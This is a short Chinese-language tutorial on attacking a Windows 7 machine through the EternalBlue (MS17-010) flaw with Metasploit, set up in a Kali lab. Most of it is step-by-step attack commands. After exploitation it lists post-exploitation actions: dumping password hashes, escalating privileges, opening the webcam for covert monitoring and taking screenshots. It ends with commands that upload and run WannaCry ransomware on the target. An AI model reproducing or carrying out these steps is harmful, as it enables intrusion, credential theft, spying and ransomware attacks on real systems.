一.介绍永恒之蓝:
二.环境
宿主机kali:
IP地址
靶机win7:
IP地址
然后关闭靶机防火墙,将kali,和win7的网络模式更改为NAT模式,然后使用宿主机和靶机ping对方的机器,保证ping通.
三.msfconsole的使用
1.输入命令msfconslole使用msf框架
2.search MSF17-010 搜索相关脚本
auxiliary插件是用来辅助验证程序扫描的
exploit插件是用来攻击的,攻击脚本
3.通过代码来调用这些脚本,use+代码
(1)如use+启动扫描模块
(2)输入命令 show options产看模块配置需要的参数
(3)配置机器目标IP set rhosts+ 靶机IP
(4)run 启动
(5)扫描结束以后切换攻击模块
(6)产看配置项show options
(7)配置目标机器IP
(8)run
session 建立一个会话
(9)攻击成功
输入shell
可以查看靶机一些信息
乱码是因为中文的原因,不要紧
(10)输入exit可以退出
输入hashdump可以查看靶机的用户以及hash密码,当然hash密码需要用MD5来进行解密
注意,如果密码简单,md5可以解密成功,否则它也无法解密,毕竟它采取的也是爆破.
还有一些用法可用help来进行查看
getuid,sysinfo /*查看系统信息*/
webcam_list /*看看被控制的电脑有没有摄像头,如果有用`webcam_stream`命令可以打开摄像头监控*/
route /*查看路由表 */
screenshot /*桌面截图,很卡* /
shell /*打开命令行,然后可以ipconfig/whoami/net user*/
ps /*看看开了哪些杀毒软件,内网一致*/ kill hashdump getsystem 提权 upload wcry/wcry.ext c:\ upload wcry/FILE_ID.DIZ c:\ execute -f c:\wcry.exe 上传和执行勒索病毒,